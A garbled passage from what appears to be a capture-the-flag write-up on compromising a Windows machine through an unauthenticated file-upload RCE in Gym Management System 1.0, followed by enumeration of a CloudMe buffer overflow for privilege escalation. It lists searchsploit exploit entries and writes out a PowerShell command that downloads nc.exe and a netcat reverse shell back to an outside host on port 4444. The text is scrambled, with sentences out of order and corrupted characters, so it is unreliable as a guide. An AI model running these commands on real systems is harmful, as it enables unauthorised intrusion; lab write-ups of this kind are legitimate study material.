┌──(root?kali)-ĬloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.pyĬloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txtĬloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.pyĬloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rbĬloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.pyĬloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rbĬloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.pyĬloudMe Sync 1.11.2 - Buffer Overflow Egghunt | windows/remote/46218.pyĬloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py Looking at searchsploit output we can see that there is a buffer overflow vulnerability in Cloudme 1.11.2. There was also an exe in Shauns download folder telling me what version of CloudMe is running.Ģ Dir(s) 7,133,970,432 bytes free Buffer overflow vulnerability Looking at the processes running I can see that CloudMe is running on the port 8888. Proto Local Address Foreign Address State PID Privilege Escalation EnumerationĪfter enumerating the machine I found that there was two ports listening on localhost. # Start listener and execute nc.exe reverse shellĬ:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 10.10.14.18 4444Ĭonnect to from (UNKNOWN) 50569 # Copy nc.exe to target machineĬ:\xampp\htdocs\gym\upload> powershell -c (New-Object Net.WebClient).DownloadFile('', 'nc.exe') The shell I got was very unstable, so I wanted to upgrade it. Support for it is now deprecated in cryptography, and will be removed in the next release. usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.p圓-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Shellcodes: No Results Initial Access Shell as shaun ┌──(root?kali). WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. ![]() In the Contact directory we can see a note that says Made using Gym Management Software 1.0.Ī quick look at searchploit reveals that there is a RCE vulnerability in this software. ![]() 7680 which is running Pando Media Public Distribution.| http-open-proxy: Potentially OPEN proxy.
0 Comments
Leave a Reply. |